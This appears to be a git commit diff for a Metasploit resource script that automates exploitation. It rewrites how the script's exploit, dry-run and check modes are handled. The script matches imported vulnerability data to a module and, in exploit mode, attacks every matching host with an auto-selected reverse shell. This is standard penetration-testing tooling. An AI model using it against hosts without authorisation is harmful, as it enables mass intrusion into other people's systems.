Rewrite how each mode is handled
parent
b449c0e21c
commit
ce107fbd6f
|
@ -1,4 +1,3 @@
|
|||
|
||||
<ruby>
|
||||
#
|
||||
# Print the help function
|
||||
|
@ -6,25 +5,27 @@
|
|||
def help_me
|
||||
help = %Q|
|
||||
Description:
|
||||
This Metasploit RC file can be used to automate the exploitation process. Before
|
||||
using this script, you should import your vulnerability results to Metasploit, and
|
||||
then it will exploit each possible host when there is a match to one of the
|
||||
references. A reverse shell is automatically selected for you, and will always
|
||||
default to a suitable meterpreter.
|
||||
This Metasploit RC file can be used to automate the exploitation process. Before using the
|
||||
script, you must import your vulnerability results to Metasploit so that it can deploy the
|
||||
module based on matching references. Three modes are available: exploit/dry/and check.
|
||||
In exploit mode, it will attempt to gain access to all vulnerable hosts with the most
|
||||
suitable reverse shell that's automatically selected. In "dry" mode (dry-run), it'll list
|
||||
all the hosts vulnerable to the exploit. In check mode, it will only trigger the check()
|
||||
function found in the module. If no mode is specified, then it'll default to 'exploit'.
|
||||
|
||||
Usage:
|
||||
./msfconsole -r [rc_path] [db_user] [db_pass] [db_workspace] [module_path] [mode]
|
||||
|
||||
Arguments:
|
||||
rc_path - Full path to the RC script
|
||||
db_user - Username for MSF database (datastore: 'DB_USER')
|
||||
db_pass - Password for MSF database (datastore: 'DB_PASS')
|
||||
db_worksapce - Workspace for the database (datastore: 'DB_WORKSPACE')
|
||||
module_path - Path to the exploit (datastore: 'MODULE')
|
||||
mode - Optional. Dry-run mode [dry/check] (datastore: 'MODE')
|
||||
db_user - Username for MSF database (datastore: 'DB_USER')
|
||||
db_pass - Password for MSF database (datastore: 'DB_PASS')
|
||||
db_worksapce - Workspace for the database (datastore: 'DB_WORKSPACE')
|
||||
module_path - Path to the exploit (datastore: 'MODULE')
|
||||
mode - Optional. Accept:exploit/dry/check (datastore: 'MODE')
|
||||
|
||||
Example:
|
||||
msfconsole -r autoexploit.rc username password msf windows/smb/ms08_067_netapi dry
|
||||
Example of running an exploit:
|
||||
msfconsole -r autoexploit.rc username password msf windows/smb/ms08_067_netapi
|
||||
|
||||
Authors:
|
||||
sinn3r <sinn3r[at]metasploit.com>
|
||||
|
@ -114,7 +115,7 @@ end
|
|||
|
||||
|
||||
#
|
||||
# Start the exploitation
|
||||
# Exploit mode
|
||||
#
|
||||
def auto_exploit(module_path)
|
||||
exploit = load_exploit(module_path)
|
||||
|
@ -146,9 +147,9 @@ end
|
|||
|
||||
|
||||
#
|
||||
# Find all mathing references
|
||||
# Dry-run mode
|
||||
#
|
||||
def dry_run(module_path,mode)
|
||||
def dry_run(module_path)
|
||||
exploit = load_exploit(module_path)
|
||||
raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil?
|
||||
|
||||
|
@ -157,15 +158,29 @@ def dry_run(module_path,mode)
|
|||
framework.db.workspace.vulns.each do |vuln|
|
||||
next if not ref_has_match(vuln.refs, exploit_refs)
|
||||
addr = vuln.host.address.to_s
|
||||
print_good("#{addr} seems vulnerable to #{exploit.shortname}")
|
||||
if mode == "check"
|
||||
print_good("checking #{addr} with check mechanism of #{exploit.shortname}")
|
||||
run_single("use #{exploit.fullname}")
|
||||
run_single("set RHOST #{addr}")
|
||||
run_single("check")
|
||||
run_single("back")
|
||||
print_line("")
|
||||
end
|
||||
print_good("#{addr} has a matching reference to #{exploit.shortname}")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Check mode
|
||||
#
|
||||
def check_exploit(module_path)
|
||||
exploit = load_exploit(module_path)
|
||||
raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil?
|
||||
|
||||
exploit_refs = exploit.references
|
||||
|
||||
framework.db.workspace.vulns.each do |vuln|
|
||||
next if not ref_has_match(vuln.refs, exploit_refs)
|
||||
print_good("Checking #{exploit.shortname} against host #{vuln.host.address.to_s}")
|
||||
run_single("use #{exploit.fullname}")
|
||||
run_single("set RHOST #{vuln.host.address.to_s}")
|
||||
run_single("check")
|
||||
select(nil, nil, nil, 1)
|
||||
run_single("back")
|
||||
print_line()
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -198,7 +213,7 @@ def init_args
|
|||
args[:db_pass] = ARGV.shift || datastore['DB_PASS'] || ''
|
||||
args[:db_workspace] = ARGV.shift || datastore['DB_WORKSPACE'] || ''
|
||||
args[:module] = ARGV.shift || datastore['MODULE'] || ''
|
||||
args[:mode] = (ARGV.shift || datastore['MODE'] || '')
|
||||
args[:mode] = ARGV.shift || datastore['MODE'] || 'exploit'
|
||||
|
||||
raise ArgumentError, "Missing a module path" if args[:module].empty?
|
||||
|
||||
|
@ -223,10 +238,15 @@ begin
|
|||
end
|
||||
end
|
||||
|
||||
if (args[:mode] == "dry" or args[:mode] == "check")
|
||||
dry_run(args[:module], args[:mode])
|
||||
else
|
||||
case args[:mode]
|
||||
when /^exploit$/i
|
||||
auto_exploit(args[:module])
|
||||
when /^dry$/i
|
||||
dry_run(args[:module])
|
||||
when /^check$/i
|
||||
check_exploit(args[:module])
|
||||
else
|
||||
raise ArgumentError, "Invalid mode"
|
||||
end
|
||||
|
||||
rescue ArgumentError => e
|
||||
|
|
Loading…
Reference in New Issue